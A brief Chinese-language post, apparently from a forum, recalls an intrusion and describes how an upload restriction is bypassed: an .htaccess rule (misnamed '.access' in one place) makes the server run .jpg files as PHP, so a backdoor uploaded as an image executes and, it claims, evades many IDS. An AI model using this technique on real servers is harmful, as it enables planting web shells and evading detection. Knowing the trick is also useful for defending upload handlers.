今天看到这个问题,正好想到前段时间遇到的一个入侵事件,存在上传的漏洞,但是不允许直接上传PHP后门,其实可以通过.htaccess来执行PHP后门的,首先上传一个.access的文件,内容如下:

<FilesMatch “jpg”>
SetHandler application/x-httpd-php
</FilesMatch>

然后上传一个jpg后缀的后门就行了。

这种方法也可以绕过许多IDS的检测。